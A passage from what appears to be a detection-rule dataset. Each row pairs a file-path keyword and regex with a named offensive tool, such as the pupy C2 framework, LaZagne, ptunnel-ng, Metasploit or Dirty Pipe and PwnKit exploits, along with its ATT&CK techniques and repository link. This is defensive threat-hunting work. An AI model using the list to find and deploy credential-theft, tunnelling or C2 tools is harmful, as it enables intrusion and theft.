receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*/psscanner.go*",".{0,1000}\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/psscanner/psscanner.go*",".{0,1000}\/psscanner\/psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/PSSW100AVB*",".{0,1000}\/PSSW100AVB.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","993","161","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*/pswRecovery4Moz.txt*",".{0,1000}\/pswRecovery4Moz\.txt.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/ptunnel-ng*",".{0,1000}\/ptunnel\-ng.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*/puckiestyle/CVE-2022-0847*",".{0,1000}\/puckiestyle\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*/puppet-naivesigning.nse*",".{0,1000}\/puppet\-naivesigning\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pupwinutils/*.py*",".{0,1000}\/pupwinutils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/*.py*",".{0,1000}\/pupy\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/commands/*",".{0,1000}\/pupy\/commands\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/external/creddump7*",".{0,1000}\/pupy\/external\/creddump7.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/memimporter/*",".{0,1000}\/pupy\/memimporter\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/output/pupyx64*.exe*",".{0,1000}\/pupy\/output\/pupyx64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy/pupygen.py*",".{0,1000}\/pupy\/pupygen\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupy_load.*",".{0,1000}\/pupy_load\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyCmd.py*",".{0,1000}\/PupyCmd\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyCompile.py*",".{0,1000}\/PupyCompile\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupygen.py*",".{0,1000}\/pupygen\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupylib/payloads/*",".{0,1000}\/pupylib\/payloads\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyOffload.py*",".{0,1000}\/PupyOffload\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupyps.py*",".{0,1000}\/pupyps\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyServer.py*",".{0,1000}\/PupyServer\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyService.py*",".{0,1000}\/PupyService\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupysh.py*",".{0,1000}\/pupysh\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyTriggers.py*",".{0,1000}\/PupyTriggers\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PupyWeb.py*",".{0,1000}\/PupyWeb\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupyx64.exe*",".{0,1000}\/pupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/pupyx86.exe*",".{0,1000}\/pupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PurpleSharp.exe*",".{0,1000}\/PurpleSharp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/putter.profile*",".{0,1000}\/putter\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/pwcrack.sh*",".{0,1000}\/pwcrack\.sh.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "*/pwn_php.me*",".{0,1000}\/pwn_php\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/pwn_python.me*",".{0,1000}\/pwn_python\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/PwnDB.py*",".{0,1000}\/PwnDB\.py.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*/pwndrop.git*",".{0,1000}\/pwndrop\.git.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*/pwndrop.ini*",".{0,1000}\/pwndrop\.ini.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*/Pwned.as*",".{0,1000}\/Pwned\.as.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PwnKit-Exploit*",".{0,1000}\/PwnKit\-Exploit.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","82","15","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" "*/pxesploit/*",".{0,1000}\/pxesploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PXEThief*",".{0,1000}\/PXEThief.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*/pxexploit*",".{0,1000}\/pxexploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/py_oneliner.py*",".{0,1000}\/py_oneliner\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - 